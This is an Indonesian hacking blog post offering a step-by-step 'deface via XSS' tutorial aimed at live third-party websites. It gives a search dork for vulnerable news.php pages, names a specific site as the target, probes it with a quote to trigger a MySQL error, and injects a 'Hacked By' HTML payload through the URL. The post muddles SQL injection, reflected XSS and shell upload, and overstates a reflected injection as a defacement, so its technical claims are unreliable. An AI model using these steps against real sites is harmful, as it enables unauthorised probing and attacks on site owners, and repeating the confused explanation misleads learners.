Tutorial Deface Metode XSS - Om Heker

Sunday, September 29, 2019

Tutorial Deface Metode XSS

Baca Juga



Halo sobat om heker kali ini om heker akan menjelaskan sedikit tutorial Deface Metode XSS upload Shell atau disebut juga Cross Site Scripting Attack adalah metode dimana client memasukan script HTML kedalam sebuah website.

oke Berikut penjelasannya dari tutorial Deface Metode XSS :

1.) Dorking, Dork :
inurl:news.php?id= ( kembangkan )


2.) Pilih lah salah satu situs atau website.


Screenshot_20180615-154848-picsay
Contohnya saya menggunakan situs :
http://www.jmtv.com/news.php?id=3

3.)  Cobalah masukan ' dibelakang url contohnya :
http://www.jmtv.com/news.php?id=3'

Jika blank ataupun muncul sql bla bla berarti vuln contohnya situs yang saya gunakan ini muncul :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
4.) Selanjutnya coba masukan script HTML dibelakang url contohnya :
http://www.jmtv.com/news.php?id=3%27<h1>Hacked By MastahCyber</h1>
Tips! : Kalian juga bisa mengubahnya dengan script HTML lainnya.

Nah setelah seperti itu akan muncul seperti gambar dibawah ini berarti kita berhasil mendeface situs tersebut dengan metode xss ini.
Screenshot_20180615-160038
Gunakanlah dengan bijak jangan sampai merugikan orang lain.

Sekian tutorial tentang Deface Metode XSS sampai jumpa di tutorial menarik lainnya.
Comments


EmoticonEmoticon